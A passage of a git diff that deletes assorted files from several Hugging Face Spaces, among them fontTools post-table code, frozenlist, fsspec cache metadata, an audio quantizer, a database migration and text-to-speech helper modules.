- numGlyphs = ttFont["maxp"].numGlyphs - data = data[2:] - indices = array.array("H") - indices.frombytes(data[: 2 * numGlyphs]) - if sys.byteorder != "big": - indices.byteswap() - data = data[2 * numGlyphs :] - maxIndex = max(indices) - self.extraNames = extraNames = unpackPStrings(data, maxIndex - 257) - self.glyphOrder = glyphOrder = [""] * int(ttFont["maxp"].numGlyphs) - for glyphID in range(numGlyphs): - index = indices[glyphID] - if index > 257: - try: - name = extraNames[index - 258] - except IndexError: - name = "" - else: - # fetch names from standard list - name = standardGlyphOrder[index] - glyphOrder[glyphID] = name - self.build_psNameMapping(ttFont) - - def build_psNameMapping(self, ttFont): - mapping = {} - allNames = {} - for i in range(ttFont["maxp"].numGlyphs): - glyphName = psName = self.glyphOrder[i] - if glyphName == "": - glyphName = "glyph%.5d" % i - if glyphName in allNames: - # make up a new glyphName that's unique - n = allNames[glyphName] - while (glyphName + "#" + str(n)) in allNames: - n += 1 - allNames[glyphName] = n + 1 - glyphName = glyphName + "#" + str(n) - - self.glyphOrder[i] = glyphName - allNames[glyphName] = 1 - if glyphName != psName: - mapping[glyphName] = psName - - self.mapping = mapping - - def decode_format_3_0(self, data, ttFont): - # Setting self.glyphOrder to None will cause the TTFont object - # try and construct glyph names from a Unicode cmap table. - self.glyphOrder = None - - def decode_format_4_0(self, data, ttFont): - from fontTools import agl - - numGlyphs = ttFont["maxp"].numGlyphs - indices = array.array("H") - indices.frombytes(data) - if sys.byteorder != "big": - indices.byteswap() - # In some older fonts, the size of the post table doesn't match - # the number of glyphs. Sometimes it's bigger, sometimes smaller. 
- self.glyphOrder = glyphOrder = [""] * int(numGlyphs) - for i in range(min(len(indices), numGlyphs)): - if indices[i] == 0xFFFF: - self.glyphOrder[i] = "" - elif indices[i] in agl.UV2AGL: - self.glyphOrder[i] = agl.UV2AGL[indices[i]] - else: - self.glyphOrder[i] = "uni%04X" % indices[i] - self.build_psNameMapping(ttFont) - - def encode_format_2_0(self, ttFont): - numGlyphs = ttFont["maxp"].numGlyphs - glyphOrder = ttFont.getGlyphOrder() - assert len(glyphOrder) == numGlyphs - indices = array.array("H") - extraDict = {} - extraNames = self.extraNames = [ - n for n in self.extraNames if n not in standardGlyphOrder - ] - for i in range(len(extraNames)): - extraDict[extraNames[i]] = i - for glyphID in range(numGlyphs): - glyphName = glyphOrder[glyphID] - if glyphName in self.mapping: - psName = self.mapping[glyphName] - else: - psName = glyphName - if psName in extraDict: - index = 258 + extraDict[psName] - elif psName in standardGlyphOrder: - index = standardGlyphOrder.index(psName) - else: - index = 258 + len(extraNames) - extraDict[psName] = len(extraNames) - extraNames.append(psName) - indices.append(index) - if sys.byteorder != "big": - indices.byteswap() - return ( - struct.pack(">H", numGlyphs) + indices.tobytes() + packPStrings(extraNames) - ) - - def encode_format_4_0(self, ttFont): - from fontTools import agl - - numGlyphs = ttFont["maxp"].numGlyphs - glyphOrder = ttFont.getGlyphOrder() - assert len(glyphOrder) == numGlyphs - indices = array.array("H") - for glyphID in glyphOrder: - glyphID = glyphID.split("#")[0] - if glyphID in agl.AGL2UV: - indices.append(agl.AGL2UV[glyphID]) - elif len(glyphID) == 7 and glyphID[:3] == "uni": - indices.append(int(glyphID[3:], 16)) - else: - indices.append(0xFFFF) - if sys.byteorder != "big": - indices.byteswap() - return indices.tobytes() - - def toXML(self, writer, ttFont): - formatstring, names, fixes = sstruct.getformat(postFormat) - for name in names: - value = getattr(self, name) - writer.simpletag(name, value=value) 
- writer.newline() - if hasattr(self, "mapping"): - writer.begintag("psNames") - writer.newline() - writer.comment( - "This file uses unique glyph names based on the information\n" - "found in the 'post' table. Since these names might not be unique,\n" - "we have to invent artificial names in case of clashes. In order to\n" - "be able to retain the original information, we need a name to\n" - "ps name mapping for those cases where they differ. That's what\n" - "you see below.\n" - ) - writer.newline() - items = sorted(self.mapping.items()) - for name, psName in items: - writer.simpletag("psName", name=name, psName=psName) - writer.newline() - writer.endtag("psNames") - writer.newline() - if hasattr(self, "extraNames"): - writer.begintag("extraNames") - writer.newline() - writer.comment( - "following are the name that are not taken from the standard Mac glyph order" - ) - writer.newline() - for name in self.extraNames: - writer.simpletag("psName", name=name) - writer.newline() - writer.endtag("extraNames") - writer.newline() - if hasattr(self, "data"): - writer.begintag("hexdata") - writer.newline() - writer.dumphex(self.data) - writer.endtag("hexdata") - writer.newline() - - def fromXML(self, name, attrs, content, ttFont): - if name not in ("psNames", "extraNames", "hexdata"): - setattr(self, name, safeEval(attrs["value"])) - elif name == "psNames": - self.mapping = {} - for element in content: - if not isinstance(element, tuple): - continue - name, attrs, content = element - if name == "psName": - self.mapping[attrs["name"]] = attrs["psName"] - elif name == "extraNames": - self.extraNames = [] - for element in content: - if not isinstance(element, tuple): - continue - name, attrs, content = element - if name == "psName": - self.extraNames.append(attrs["name"]) - else: - self.data = readHex(content) - - -def unpackPStrings(data, n): - # extract n Pascal strings from data. 
- # if there is not enough data, use "" - - strings = [] - index = 0 - dataLen = len(data) - - for _ in range(n): - if dataLen <= index: - length = 0 - else: - length = byteord(data[index]) - index += 1 - - if dataLen <= index + length - 1: - name = "" - else: - name = tostr(data[index : index + length], encoding="latin1") - strings.append(name) - index += length - - if index < dataLen: - log.warning("%d extra bytes in post.stringData array", dataLen - index) - - elif dataLen < index: - log.warning("not enough data in post.stringData array") - - return strings - - -def packPStrings(strings): - data = b"" - for s in strings: - data = data + bytechr(len(s)) + tobytes(s, encoding="latin1") - return data diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py deleted file mode 100644 index 152356588d3e619bddb7e2ecd76b147a4e55a96c..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py +++ /dev/null @@ -1,95 +0,0 @@ -import os -import sys -import types -from collections.abc import MutableSequence -from functools import total_ordering -from typing import Type - -__version__ = "1.4.0" - -__all__ = ("FrozenList", "PyFrozenList") # type: Tuple[str, ...] 
- - -NO_EXTENSIONS = bool(os.environ.get("FROZENLIST_NO_EXTENSIONS")) # type: bool - - -@total_ordering -class FrozenList(MutableSequence): - __slots__ = ("_frozen", "_items") - - if sys.version_info >= (3, 9): - __class_getitem__ = classmethod(types.GenericAlias) - else: - - @classmethod - def __class_getitem__(cls: Type["FrozenList"]) -> Type["FrozenList"]: - return cls - - def __init__(self, items=None): - self._frozen = False - if items is not None: - items = list(items) - else: - items = [] - self._items = items - - @property - def frozen(self): - return self._frozen - - def freeze(self): - self._frozen = True - - def __getitem__(self, index): - return self._items[index] - - def __setitem__(self, index, value): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - self._items[index] = value - - def __delitem__(self, index): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - del self._items[index] - - def __len__(self): - return self._items.__len__() - - def __iter__(self): - return self._items.__iter__() - - def __reversed__(self): - return self._items.__reversed__() - - def __eq__(self, other): - return list(self) == other - - def __le__(self, other): - return list(self) <= other - - def insert(self, pos, item): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - self._items.insert(pos, item) - - def __repr__(self): - return f"<FrozenList(frozen={self._frozen}, {self._items!r})>" - - def __hash__(self): - if self._frozen: - return hash(tuple(self)) - else: - raise RuntimeError("Cannot hash unfrozen list.") - - -PyFrozenList = FrozenList - - -try: - from ._frozenlist import FrozenList as CFrozenList # type: ignore - - if not NO_EXTENSIONS: # pragma: no cover - FrozenList = CFrozenList # type: ignore -except ImportError: # pragma: no cover - pass diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py
b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py deleted file mode 100644 index 16964c2a7153d40b480dd47513d1129ed27e307b..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py +++ /dev/null @@ -1,232 +0,0 @@ -from __future__ import annotations - -import os -import pickle -import time -from typing import TYPE_CHECKING - -from fsspec.utils import atomic_write - -try: - import ujson as json -except ImportError: - if not TYPE_CHECKING: - import json - -if TYPE_CHECKING: - from typing import Any, Dict, Iterator, Literal - - from typing_extensions import TypeAlias - - from .cached import CachingFileSystem - - Detail: TypeAlias = Dict[str, Any] - - -class CacheMetadata: - """Cache metadata. - - All reading and writing of cache metadata is performed by this class, - accessing the cached files and blocks is not. - - Metadata is stored in a single file per storage directory in JSON format. - For backward compatibility, also reads metadata stored in pickle format - which is converted to JSON when next saved. - """ - - def __init__(self, storage: list[str]): - """ - - Parameters - ---------- - storage: list[str] - Directories containing cached files, must be at least one. Metadata - is stored in the last of these directories by convention. - """ - if not storage: - raise ValueError("CacheMetadata expects at least one storage location") - - self._storage = storage - self.cached_files: list[Detail] = [{}] - - # Private attribute to force saving of metadata in pickle format rather than - # JSON for use in tests to confirm can read both pickle and JSON formats. 
- self._force_save_pickle = False - - def _load(self, fn: str) -> Detail: - """Low-level function to load metadata from specific file""" - try: - with open(fn, "r") as f: - return json.load(f) - except ValueError: - with open(fn, "rb") as f: - return pickle.load(f) - - def _save(self, metadata_to_save: Detail, fn: str) -> None: - """Low-level function to save metadata to specific file""" - if self._force_save_pickle: - with atomic_write(fn) as f: - pickle.dump(metadata_to_save, f) - else: - with atomic_write(fn, mode="w") as f: - json.dump(metadata_to_save, f) - - def _scan_locations( - self, writable_only: bool = False - ) -> Iterator[tuple[str, str, bool]]: - """Yield locations (filenames) where metadata is stored, and whether - writable or not. - - Parameters - ---------- - writable: bool - Set to True to only yield writable locations. - - Returns - ------- - Yields (str, str, bool) - """ - n = len(self._storage) - for i, storage in enumerate(self._storage): - writable = i == n - 1 - if writable_only and not writable: - continue - yield os.path.join(storage, "cache"), storage, writable - - def check_file( - self, path: str, cfs: CachingFileSystem | None - ) -> Literal[False] | tuple[Detail, str]: - """If path is in cache return its details, otherwise return ``False``. - - If the optional CachingFileSystem is specified then it is used to - perform extra checks to reject possible matches, such as if they are - too old. 
- """ - for (fn, base, _), cache in zip(self._scan_locations(), self.cached_files): - if path not in cache: - continue - detail = cache[path].copy() - - if cfs is not None: - if cfs.check_files and detail["uid"] != cfs.fs.ukey(path): - # Wrong file as determined by hash of file properties - continue - if cfs.expiry and time.time() - detail["time"] > cfs.expiry: - # Cached file has expired - continue - - fn = os.path.join(base, detail["fn"]) - if os.path.exists(fn): - return detail, fn - return False - - def clear_expired(self, expiry_time: int) -> tuple[list[str], bool]: - """Remove expired metadata from the cache. - - Returns names of files corresponding to expired metadata and a boolean - flag indicating whether the writable cache is empty. Caller is - responsible for deleting the expired files. - """ - expired_files = [] - for path, detail in self.cached_files[-1].copy().items(): - if time.time() - detail["time"] > expiry_time: - fn = detail.get("fn", "") - if not fn: - raise RuntimeError( - f"Cache metadata does not contain 'fn' for {path}" - ) - fn = os.path.join(self._storage[-1], fn) - expired_files.append(fn) - self.cached_files[-1].pop(path) - - if self.cached_files[-1]: - cache_path = os.path.join(self._storage[-1], "cache") - self._save(self.cached_files[-1], cache_path) - - writable_cache_empty = not self.cached_files[-1] - return expired_files, writable_cache_empty - - def load(self) -> None: - """Load all metadata from disk and store in ``self.cached_files``""" - cached_files = [] - for fn, _, _ in self._scan_locations(): - if os.path.exists(fn): - # TODO: consolidate blocks here - loaded_cached_files = self._load(fn) - for c in loaded_cached_files.values(): - if isinstance(c["blocks"], list): - c["blocks"] = set(c["blocks"]) - cached_files.append(loaded_cached_files) - else: - cached_files.append({}) - self.cached_files = cached_files or [{}] - - def on_close_cached_file(self, f: Any, path: str) -> None: - """Perform side-effect actions on closing a 
cached file. - - The actual closing of the file is the responsibility of the caller. - """ - # File must be writeble, so in self.cached_files[-1] - c = self.cached_files[-1][path] - if c["blocks"] is not True and len(c["blocks"]) * f.blocksize >= f.size: - c["blocks"] = True - - def pop_file(self, path: str) -> str | None: - """Remove metadata of cached file. - - If path is in the cache, return the filename of the cached file, - otherwise return ``None``. Caller is responsible for deleting the - cached file. - """ - details = self.check_file(path, None) - if not details: - return None - _, fn = details - if fn.startswith(self._storage[-1]): - self.cached_files[-1].pop(path) - self.save() - else: - raise PermissionError( - "Can only delete cached file in last, writable cache location" - ) - return fn - - def save(self) -> None: - """Save metadata to disk""" - for (fn, _, writable), cache in zip(self._scan_locations(), self.cached_files): - if not writable: - continue - - if os.path.exists(fn): - cached_files = self._load(fn) - for k, c in cached_files.items(): - if k in cache: - if c["blocks"] is True or cache[k]["blocks"] is True: - c["blocks"] = True - else: - # self.cached_files[*][*]["blocks"] must continue to - # point to the same set object so that updates - # performed by MMapCache are propagated back to - # self.cached_files. 
- blocks = cache[k]["blocks"] - blocks.update(c["blocks"]) - c["blocks"] = blocks - c["time"] = max(c["time"], cache[k]["time"]) - c["uid"] = cache[k]["uid"] - - # Files can be added to cache after it was written once - for k, c in cache.items(): - if k not in cached_files: - cached_files[k] = c - else: - cached_files = cache - cache = {k: v.copy() for k, v in cached_files.items()} - for c in cache.values(): - if isinstance(c["blocks"], set): - c["blocks"] = list(c["blocks"]) - self._save(cache, fn) - self.cached_files[-1] = cached_files - - def update_file(self, path: str, detail: Detail) -> None: - """Update metadata for specific file in memory, do not save""" - self.cached_files[-1][path] = detail diff --git a/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py b/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py deleted file mode 100644 index f67c3a0cd30d4b8993a36c587f00dc8a451d926f..0000000000000000000000000000000000000000 --- a/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py +++ /dev/null @@ -1,116 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import math -import typing as tp - -import torch - -from .base import BaseQuantizer, QuantizedResult -from .core_vq import ResidualVectorQuantization - - -class ResidualVectorQuantizer(BaseQuantizer): - """Residual Vector Quantizer. - - Args: - dimension (int): Dimension of the codebooks. - n_q (int): Number of residual vector quantizers used. - q_dropout (bool): Random quantizer drop out at train time. - bins (int): Codebook size. - decay (float): Decay for exponential moving average over the codebooks. - kmeans_init (bool): Whether to use kmeans to initialize the codebooks. - kmeans_iters (int): Number of iterations used for kmeans initialization. - threshold_ema_dead_code (int): Threshold for dead code expiration. 
Replace any codes - that have an exponential moving average cluster size less than the specified threshold with - randomly selected vector from the current batch. - orthogonal_reg_weight (float): Orthogonal regularization weights. - orthogonal_reg_active_codes_only (bool): Apply orthogonal regularization only on active codes. - orthogonal_reg_max_codes (optional int): Maximum number of codes to consider. - for orthogonal regulariation. - """ - def __init__( - self, - dimension: int = 256, - n_q: int = 8, - q_dropout: bool = False, - bins: int = 1024, - decay: float = 0.99, - kmeans_init: bool = True, - kmeans_iters: int = 10, - threshold_ema_dead_code: int = 2, - orthogonal_reg_weight: float = 0.0, - orthogonal_reg_active_codes_only: bool = False, - orthogonal_reg_max_codes: tp.Optional[int] = None, - ): - super().__init__() - self.max_n_q = n_q - self.n_q = n_q - self.q_dropout = q_dropout - self.dimension = dimension - self.bins = bins - self.decay = decay - self.kmeans_init = kmeans_init - self.kmeans_iters = kmeans_iters - self.threshold_ema_dead_code = threshold_ema_dead_code - self.orthogonal_reg_weight = orthogonal_reg_weight - self.orthogonal_reg_active_codes_only = orthogonal_reg_active_codes_only - self.orthogonal_reg_max_codes = orthogonal_reg_max_codes - self.vq = ResidualVectorQuantization( - dim=self.dimension, - codebook_size=self.bins, - num_quantizers=self.n_q, - decay=self.decay, - kmeans_init=self.kmeans_init, - kmeans_iters=self.kmeans_iters, - threshold_ema_dead_code=self.threshold_ema_dead_code, - orthogonal_reg_weight=self.orthogonal_reg_weight, - orthogonal_reg_active_codes_only=self.orthogonal_reg_active_codes_only, - orthogonal_reg_max_codes=self.orthogonal_reg_max_codes, - channels_last=False - ) - - def forward(self, x: torch.Tensor, frame_rate: int): - n_q = self.n_q - if self.training and self.q_dropout: - n_q = int(torch.randint(1, self.n_q + 1, (1,)).item()) - bw_per_q = math.log2(self.bins) * frame_rate / 1000 - quantized, codes, 
commit_loss = self.vq(x, n_q=n_q) - codes = codes.transpose(0, 1) - # codes is [B, K, T], with T frames, K nb of codebooks. - bw = torch.tensor(n_q * bw_per_q).to(x) - return QuantizedResult(quantized, codes, bw, penalty=torch.mean(commit_loss)) - - def encode(self, x: torch.Tensor) -> torch.Tensor: - """Encode a given input tensor with the specified frame rate at the given bandwidth. - The RVQ encode method sets the appropriate number of quantizer to use - and returns indices for each quantizer. - """ - n_q = self.n_q - codes = self.vq.encode(x, n_q=n_q) - codes = codes.transpose(0, 1) - # codes is [B, K, T], with T frames, K nb of codebooks. - return codes - - def decode(self, codes: torch.Tensor) -> torch.Tensor: - """Decode the given codes to the quantized representation. - """ - # codes is [B, K, T], with T frames, K nb of codebooks, vq.decode expects [K, B, T]. - codes = codes.transpose(0, 1) - quantized = self.vq.decode(codes) - return quantized - - @property - def total_codebooks(self): - return self.max_n_q - - @property - def num_codebooks(self): - return self.n_q - - def set_num_codebooks(self, n: int): - assert n > 0 and n <= self.max_n_q - self.n_q = n diff --git a/spaces/josedolot/HybridNet_Demo2/hubconf.py b/spaces/josedolot/HybridNet_Demo2/hubconf.py deleted file mode 100644 index d67f48e4017d33657a077bc6f3d650ff49d6ee99..0000000000000000000000000000000000000000 --- a/spaces/josedolot/HybridNet_Demo2/hubconf.py +++ /dev/null @@ -1,37 +0,0 @@ -dependencies = ["efficientnet_pytorch", "pretrainedmodels", - "timm", "torch", "torchvision"] -import torch -from utils.utils import Params -from backbone import HybridNetsBackbone -from pathlib import Path -import os - - -def hybridnets(pretrained=True, compound_coef=3, device='cpu'): - """Creates a HybridNets model - - Arguments: - pretrained (bool): load pretrained weights into the model - compound_coef (int): compound coefficient of efficientnet backbone - device (str): 'cuda:0' or 'cpu' - - Returns: - 
HybridNets model - """ - params = Params(os.path.join(Path(__file__).resolve().parent, "projects/bdd100k.yml")) - model = HybridNetsBackbone(num_classes=len(params.obj_list), compound_coef=compound_coef, - ratios=eval(params.anchors_ratios), scales=eval(params.anchors_scales), - seg_classes=len(params.seg_list)) - if pretrained and compound_coef == 3: - weight_url = 'https://github.com/datvuthanh/HybridNets/releases/download/v1.0/hybridnets.pth' - model.load_state_dict(torch.hub.load_state_dict_from_url(weight_url, map_location=device)) - model = model.to(device) - return model - - -if __name__ == "__main__": - model = hybridnets(device='cpu') - img = torch.rand(1, 3, 384, 640) - - result = model(img) - print(result) diff --git a/spaces/jykoh/fromage/README.md b/spaces/jykoh/fromage/README.md deleted file mode 100644 index 173045e8a1ce493f5018d8f3e345929f44175938..0000000000000000000000000000000000000000 --- a/spaces/jykoh/fromage/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: FROMAGe -emoji: 🧀 -sdk: docker -app_file: app.py -colorFrom: blue -colorTo: red -pinned: true -tags: - - multimodal - - computer-vision - - nlp ---- \ No newline at end of file diff --git a/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py b/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py deleted file mode 100644 index 100bf96f2e8487a4e3376672472b6dda52ab0ce1..0000000000000000000000000000000000000000 --- a/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py +++ /dev/null @@ -1,32 +0,0 @@ -"""Added user table - -Revision ID: ead242c61258 -Revises: -Create Date: 2023-06-26 16:25:00.614978 - -""" -from alembic import op -import sqlalchemy as sa - - -# revision identifiers, used by Alembic. 
-revision = 'ead242c61258' -down_revision = None -branch_labels = None -depends_on = None - - -def upgrade() -> None: - op.create_table('users', - sa.Column('id', sa.Integer(), primary_key=True), - sa.Column('name', sa.String(), nullable=True), - sa.Column('email', sa.String(), - nullable=False, unique=True), - sa.PrimaryKeyConstraint('id') - ) - op.create_index(op.f('ix_users_email'), 'users', ['email'], unique=True) - - -def downgrade() -> None: - op.drop_index(op.f('ix_users_email'), table_name='users') - op.drop_table('users') diff --git a/spaces/kausmos/clothsy/utils/similarity.py b/spaces/kausmos/clothsy/utils/similarity.py deleted file mode 100644 index 12b5b8efa7442f4933b3b65af6715f1a4a5218da..0000000000000000000000000000000000000000 --- a/spaces/kausmos/clothsy/utils/similarity.py +++ /dev/null @@ -1,27 +0,0 @@ -from sentence_transformers import SentenceTransformer, util -import pandas as pd -import numpy as np - -clothing_data = pd.read_csv('data/clothing_data_preprocessed.csv') - -model = SentenceTransformer('model') -embeddings = np.load('data/embeddings.npy') - -def get_similar_items(query, embeddings, clothing_data, top_k): - # Encode the query text - query_embedding = model.encode([query], convert_to_tensor=True) - # Compute similarity scores - similarity_scores = util.pytorch_cos_sim(query_embedding, embeddings)[0] - # Sort indices based on similarity scores - sorted_indices = similarity_scores.argsort(descending=True) - # Get the top-k most similar indices - similar_indices = sorted_indices[:top_k].cpu().numpy() - # Get the URLs of the top-k similar items - similar_urls = clothing_data.loc[similar_indices, 'url'].tolist() - - return similar_urls - -# Assuming you have the embeddings and clothing_data available -query = "Men's jeans black color" -similar_urls = get_similar_items(query, embeddings, clothing_data, top_k=5) -print(similar_urls) \ No newline at end of file diff --git a/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py 
b/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py deleted file mode 100644 index e02ea4c5b4ba53530e559d1cab7a07b8e3c7c638..0000000000000000000000000000000000000000 --- a/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py +++ /dev/null @@ -1,25 +0,0 @@ -"""Code evaluation module.""" -from __future__ import annotations - -from autogpt.llm_utils import call_ai_function - - -def analyze_code(code: str) -> list[str]: - """ - A function that takes in a string and returns a response from create chat - completion api call. - - Parameters: - code (str): Code to be evaluated. - Returns: - A result string from create chat completion. A list of suggestions to - improve the code. - """ - - function_string = "def analyze_code(code: str) -> List[str]:" - args = [code] - description_string = ( - "Analyzes the given code and returns a list of suggestions" " for improvements." - ) - - return call_ai_function(function_string, args, description_string) diff --git a/spaces/kdrkdrkdr/HutaoTTS/README.md b/spaces/kdrkdrkdr/HutaoTTS/README.md deleted file mode 100644 index dcd14051d2c998249025ebe87f43a9eaf71276af..0000000000000000000000000000000000000000 --- a/spaces/kdrkdrkdr/HutaoTTS/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: HutaoTTS -emoji: 📈 -colorFrom: pink -colorTo: gray -sdk: gradio -sdk_version: 3.12.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/kdrkdrkdr/ProsekaTTS/commons.py b/spaces/kdrkdrkdr/ProsekaTTS/commons.py deleted file mode 100644 index 40fcc05364d4815971f5c6f9dbb8dcef8e3ec1e9..0000000000000000000000000000000000000000 --- a/spaces/kdrkdrkdr/ProsekaTTS/commons.py +++ /dev/null @@ -1,172 +0,0 @@ -import math -import torch -from torch.nn import functional as F -import torch.jit - - -def script_method(fn, _rcb=None): - return fn - - -def script(obj, optimize=True, _frames_up=0, _rcb=None): - return obj - - 
-torch.jit.script_method = script_method -torch.jit.script = script - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, 
dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, 
t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py b/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py deleted file mode 100644 index 2b8cd1427038460a7679260a424d2f01d2bcf2c5..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py +++ /dev/null @@ -1,94 +0,0 @@ -import torch -from torch import nn -from src.audio2pose_models.cvae import CVAE -from src.audio2pose_models.discriminator import PoseSequenceDiscriminator -from src.audio2pose_models.audio_encoder import AudioEncoder - -class Audio2Pose(nn.Module): - def __init__(self, cfg, wav2lip_checkpoint, device='cuda'): - super().__init__() - self.cfg = cfg - self.seq_len = cfg.MODEL.CVAE.SEQ_LEN - self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE - self.device = device - - self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device) - self.audio_encoder.eval() - for param in self.audio_encoder.parameters(): - param.requires_grad = False - - self.netG = CVAE(cfg) - self.netD_motion = PoseSequenceDiscriminator(cfg) - - - def forward(self, x): - - batch = {} - coeff_gt = x['gt'].cuda().squeeze(0) #bs frame_len+1 73 - 
